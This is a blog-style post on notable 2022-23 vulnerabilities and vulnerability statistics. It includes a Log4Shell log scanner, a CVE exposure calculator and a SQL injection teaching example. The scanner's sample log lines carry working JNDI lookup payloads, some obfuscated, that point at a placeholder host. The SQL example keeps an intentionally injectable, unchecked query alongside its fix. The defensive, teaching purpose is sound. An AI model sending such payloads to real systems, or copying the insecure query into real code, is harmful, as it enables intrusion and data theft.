A vulnerability is a weakness that leaves a system exposed to attack. In cyber security the term covers not only software bugs but also misconfigurations and design flaws, any of which can give an attacker a path to malware infection, DDoS attacks, injection attacks, data theft, or ransomware.
In this post we present five headline vulnerabilities from the past year and 30 cyber security vulnerability statistics for 2023, to build a picture of the current threat landscape across the globe.
Top 5 Cyber security vulnerability statistics in 2023
2022 saw its fair share of critical vulnerabilities, and 2023 opened with a critical one in Chromium-based browsers. From Follina to Log4Shell, a series of flaws kept security administrators and business owners on edge. Before the statistics, here is a quick look at some of the most widely discussed vulnerabilities of the period.
1. Log4Shell (CVE-2021-44228)
A remote code execution vulnerability in the Log4j logging library for Java was disclosed in December 2021. Any attacker-controlled string that an application logged, for example a crafted HTTP header, could carry a JNDI lookup that made the library fetch and execute code from an attacker-controlled server. The vulnerability was estimated to endanger more than 3 billion devices.
2. Symlink following vulnerability in Chrome (CVE-2022-3656)
This vulnerability was published only recently. Insufficient validation of user-supplied files in Chromium-based browsers meant that when a user dropped or uploaded a folder, the browser followed symbolic links inside it, allowing a malicious site to read sensitive files from outside the folder the user intended to share. It was reported to endanger 2.5 billion Chrome users.
3. Microsoft Follina MSDT bug (CVE-2022-30190)
A remote code execution flaw in the Microsoft Support Diagnostic Tool (MSDT): an Office document could invoke the ms-msdt: URL handler and run attacker-supplied code with the privileges of the user who opened it, in some cases merely by previewing an RTF file. The attacker could then view, modify, or delete data within that user's rights without first escalating privileges, putting an organization's data assets at serious risk.
4. Spring4Shell (CVE-2022-22965)
Spring is a widely used open-source framework for Java applications. A remote code execution vulnerability in Spring Framework's data binding affected applications running on JDK 9 or later; the public exploit targeted WAR deployments on Tomcat, but other configurations could also be exposed. It was fixed in Spring Framework 5.3.18 and 5.2.20. Despite the name, Spring4Shell is unrelated to Log4Shell.
5. Adobe Commerce RCE (CVE-2022-24086)
A critical improper-input-validation flaw affecting Adobe Commerce and Magento Open Source was disclosed in February 2022. It allowed arbitrary code execution on vulnerable stores without authentication and was exploited in the wild before the patch was available.
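As an added example (not code from the original post or from the Log4j project), here is detection logic of the kind a security operations team ran over web server access logs after the Log4Shell disclosure. It URL-decodes each line, collapses the ${lower:…}, ${upper:…} and ${…:-x} lookup tricks attackers used to hide the literal string jndi, and reports the lookup scheme and target. The log lines are constructed for this example and the addresses are documentation ranges.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic): one benign request, a plain
# JNDI lookup in the User-Agent, a URL-encoded one in the query string, and two
# obfuscated forms that use Log4j's own ${lower:..} and ${..:-x} lookups.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:12 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.7/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/c}"',
]

# Nested lookups used to hide the literal "jndi": ${lower:j}, ${upper:J}, ${::-j}
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]+)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup itself, with the protocols the JNDI handler will dereference
_JNDI = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^}\s]+)\}",
    re.IGNORECASE,
)


def normalize(line: str, rounds: int = 5) -> str:
    """URL-decode, then collapse nested lookups inside-out until stable (bounded)."""
    s = unquote(line)
    for _ in range(rounds):
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def find_jndi(line: str):
    """Return (scheme, target) for the first JNDI lookup in a line, or None."""
    m = _JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """Return (line_number, scheme, target) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, *found))
    return hits


if __name__ == "__main__":
    for n, scheme, target in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {target}")
```

A hit means an attempt was made against that endpoint, not that it succeeded: correlate with outbound LDAP, RMI or DNS connections from the application host, and remember that the string can also arrive in headers or form fields that a plain access log never records.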
30 Important Cyber Security Vulnerability Statistics for 2023
Vulnerabilities and the Failure to Patch Them in Time
- As of 2022, the National Vulnerability Database held 206,059 entries.
- 8,051 vulnerabilities were listed in the first quarter of 2022 alone.
The National Vulnerability Database (NVD) is maintained by NIST and sponsored by the Cybersecurity and Infrastructure Security Agency (CISA), part of the US Department of Homeland Security. It analyzes every CVE published on the CVE list. CVE stands for Common Vulnerabilities and Exposures. When security researchers or organizations find a new vulnerability, they report it to a CVE Numbering Authority, and it is added to the CVE list maintained by the MITRE Corporation under a CVE ID, so that advisories, scanners, and patches can all refer to the same flaw unambiguously.
- 80% of public exploits appear before the corresponding CVE is published. The average gap between the publication of an exploit and its CVE is 23 days.
This means that once a vulnerability is discovered, attackers often have a head start before an organization's security administrators even know it exists. The delay between a patch being published and being deployed adds a second window of exposure.
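To make that timing gap concrete, here is an added example (my own code, not from the post or from NIST or MITRE) that validates CVE IDs by their syntax, maps CVSS v3 base scores to the standard qualitative ratings, and computes three windows from a vulnerability tracker: how far ahead of the CVE a public exploit was, how long a vendor patch waited before local deployment, and the total exposure. The records, dates and scores are constructed, and the field names are my own assumption rather than any tracker's schema.

```python
import re
from datetime import date

# A CVE ID is "CVE-", a four-digit year, and a sequence number of four or more digits.
CVE_ID = re.compile(r"^CVE-(\d{4})-(\d{4,})$")


def parse_cve_id(cve_id: str):
    """Return (year, sequence) for a syntactically valid CVE ID; raise ValueError otherwise."""
    m = CVE_ID.match(cve_id.strip().upper())
    if not m:
        raise ValueError(f"not a CVE ID: {cve_id!r}")
    return int(m.group(1)), int(m.group(2))


def cvss_severity(base_score: float) -> str:
    """Map a CVSS v3.x base score to its qualitative rating."""
    if base_score == 0.0:
        return "None"
    if base_score < 4.0:
        return "Low"
    if base_score < 7.0:
        return "Medium"
    if base_score < 9.0:
        return "High"
    return "Critical"


# Constructed tracking records (hypothetical dates and scores, not real advisories).
# exploit_public: first public exploit; cve_published: CVE record went live;
# patch_available / patch_deployed: vendor release date and local rollout date.
RECORDS = [
    {"cve": "CVE-2021-0001", "cvss": 9.8, "exploit_public": date(2021, 3, 1),
     "cve_published": date(2021, 3, 20), "patch_available": date(2021, 3, 22),
     "patch_deployed": date(2021, 5, 10)},
    {"cve": "CVE-2021-0002", "cvss": 6.5, "exploit_public": date(2021, 6, 15),
     "cve_published": date(2021, 6, 1), "patch_available": date(2021, 6, 1),
     "patch_deployed": date(2021, 6, 8)},
    {"cve": "CVE-2021-0003", "cvss": 7.5, "exploit_public": date(2021, 9, 5),
     "cve_published": date(2021, 9, 30), "patch_available": date(2021, 10, 2),
     "patch_deployed": date(2021, 11, 1)},
]


def exposure_windows(rec):
    """Compute the attacker head start and patch lag, in days, for one record."""
    parse_cve_id(rec["cve"])  # reject malformed identifiers before doing arithmetic
    return {
        "cve": rec["cve"],
        "severity": cvss_severity(rec["cvss"]),
        # positive: the exploit was public before the CVE existed
        "exploit_lead_days": (rec["cve_published"] - rec["exploit_public"]).days,
        # time between the vendor shipping a fix and it reaching this estate
        "patch_lag_days": (rec["patch_deployed"] - rec["patch_available"]).days,
        # from the earliest public knowledge of the flaw to the local fix
        "total_exposure_days": (rec["patch_deployed"]
                                - min(rec["exploit_public"], rec["cve_published"])).days,
    }


def summarize(records):
    """Share of records where an exploit preceded the CVE, and the mean lead in those cases."""
    rows = [exposure_windows(r) for r in records]
    ahead = [r["exploit_lead_days"] for r in rows if r["exploit_lead_days"] > 0]
    return {
        "rows": rows,
        "exploit_first_share": len(ahead) / len(rows),
        "mean_exploit_lead_days": sum(ahead) / len(ahead) if ahead else 0.0,
    }


if __name__ == "__main__":
    summary = summarize(RECORDS)
    for row in summary["rows"]:
        print(row)
    print(f"exploit before CVE: {summary['exploit_first_share']:.0%}, "
          f"mean lead {summary['mean_exploit_lead_days']:.1f} days")
```

The same three numbers, collected from a real tracker rather than constructed rows, are what let a team compare its own patch lag against the industry figures quoted further down.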
- In 2021, 18% of all attacks were mounted through vulnerabilities listed in 2013 or earlier.
- Three out of four attacks were launched through vulnerabilities disclosed in or before 2017.
- A study shows that 84% of companies have high-risk vulnerabilities, half of which could be removed with a simple software update.
- 60% of data breaches are caused by the failure to apply available patches.
These statistics show that a strong security posture depends on security awareness at both the corporate and the technical level, and they point to a widespread lack of vulnerability management and overall security posture management.
Detection and Severity of Vulnerabilities
- A 2020 report by the World Economic Forum estimated the likelihood that a cybercrime actor in the US is detected and prosecuted at as low as 0.05%.
- 43% of cyber attacks are aimed at small businesses whereas only 14% are prepared to defend themselves.
- Companies with fewer than 100 employees have the fewest critical or high-severity vulnerabilities.
- Companies with more than 10,000 employees have the most critical-severity vulnerabilities.
- 4.6% of vulnerabilities in web applications are critical and 4.4% are high severity.
- The share of critical vulnerabilities rises to 8% for applications that process payment card data.
This underlines the importance of PCI DSS compliance for companies that process or store payment card information. Interestingly, the presence of vulnerabilities in an application can also be tied to its age.
State of Security by Age of Application
- According to a study by Veracode, 80% of applications do not take on new flaws in the first 1.5 years after their initial scan.
After that point the number of vulnerabilities starts to climb, and flaws in older applications are fixed less often.
- Almost 70% of applications contain at least one vulnerability after 5 years in production.
- 19% of software scanned in 2022 had high or critical severity vulnerabilities.
We have seen how common vulnerabilities are in web applications. It is time to look at the different types of vulnerabilities and at what actually enables attacks.
What Caused the Attacks
- 57% of all cyber attacks are attributed to phishing and social engineering.
- Compromised or stolen devices account for 33% of attacks
- Credential theft is responsible for 30% of attacks.
- Broken access control was ranked number 1 on the 2021 OWASP Top 10 list.
- It had an average incidence rate of 3.81%, and the 34 CWEs mapped to this category occurred in tested applications more often than those of any other category.
- Injection had an average incidence rate of 3.37%, and security misconfiguration 4.5%.
- A study shows that zero-day malware accounted for 66% of all threats in the last quarter of 2021.
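The top two OWASP categories above are easiest to see side by side in code. The following is an added example (not from the original post or from OWASP): a record lookup that is both injectable, because the identifier is pasted into the SQL text (CWE-89), and missing an ownership check, so any authenticated user can read any record, next to the hardened version with a parameterised query and an explicit owner predicate. The invoice table and users are constructed for the example; security misconfiguration, the third category, is a deployment matter and is not shown.

```python
import sqlite3


def make_db():
    """Constructed in-memory database: two users, each owning one invoice."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner TEXT, amount INTEGER)")
    db.executemany("INSERT INTO invoices VALUES (?, ?, ?)",
                   [(1, "alice", 120), (2, "bob", 999)])
    db.commit()
    return db


# --- Vulnerable: SQL injection plus broken access control ------------------
def get_invoice_vulnerable(db, user, invoice_id):
    """The caller's identity is ignored and the id is interpolated into the query."""
    # A value like "1 OR 1=1" rewrites the WHERE clause, and nothing checks
    # that `user` owns the requested invoice, so alice can read bob's record.
    sql = f"SELECT id, owner, amount FROM invoices WHERE id = {invoice_id}"
    return db.execute(sql).fetchall()


# --- Hardened: parameterised query plus an ownership predicate --------------
def get_invoice_hardened(db, user, invoice_id):
    """Only returns the invoice if it exists AND belongs to the requesting user."""
    try:
        invoice_id = int(invoice_id)  # reject anything that is not a plain integer
    except (TypeError, ValueError):
        return []
    # Placeholders keep the value out of the SQL grammar; the owner predicate
    # enforces access control in the query itself rather than in the caller.
    sql = "SELECT id, owner, amount FROM invoices WHERE id = ? AND owner = ?"
    return db.execute(sql, (invoice_id, user)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, alice asks for 2:       ", get_invoice_vulnerable(db, "alice", "2"))
    print("vulnerable, alice asks for 1 OR 1=1:", get_invoice_vulnerable(db, "alice", "1 OR 1=1"))
    print("hardened,   alice asks for 2:       ", get_invoice_hardened(db, "alice", "2"))
    print("hardened,   alice asks for 1 OR 1=1:", get_invoice_hardened(db, "alice", "1 OR 1=1"))
    print("hardened,   alice asks for 1:       ", get_invoice_hardened(db, "alice", "1"))
```

The ownership predicate belongs in the data access layer, not in each route handler: OWASP's "deny by default" advice for broken access control is much easier to audit when there is one place where the check cannot be forgotten.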
Vulnerabilities in the Cloud
- In January 2020, security researchers disclosed a critical vulnerability with a CVSS score of 10.0 in Microsoft Azure infrastructure.
This discovery punctured the notion that cloud infrastructure is secure beyond reproach. Since then, cloud security and cloud vulnerabilities have been a continuing concern for stakeholders.
- Since 2020, there has been a 205% increase in cloud security issues in the public sector.
Finding and identifying vulnerabilities is only one part of a cyber security program. Prioritizing them and managing the remediation process takes a comparable amount of effort.
Prioritization & Remediation of Vulnerabilities
- 47% of DevSecOps professionals say that the failure to prioritize vulnerabilities, i.e. to decide which one to fix first, is a major contributor to vulnerability backlogs.
- Teams spend an average of 130 hours per week monitoring and tracking threats.
- It takes more than 20 minutes of manual effort to detect, prioritize, and remediate one vulnerability.
The time required to remediate a vulnerability differs greatly between industries. For instance:
- The MTTR (mean time to remediate) for public administration was 92 days in 2022, versus 44 days for healthcare institutions.
- The average MTTR in 2022 was 57.5 days, a slight improvement on 60.3 days in 2021.
2022 was a year of notable vulnerabilities like Log4Shell and Spring4Shell that wreaked havoc. It also witnessed a steady redressal of the poor cyber security standards that followed the pandemic.
We have seen vulnerabilities patched with rapidity as well as one (CVE-1999-0517) that has been with us since 1999. Overall it was a good year for anyone interested in the ebb and flow of the cyber security landscape, and these vulnerability statistics are a reflection of that motion.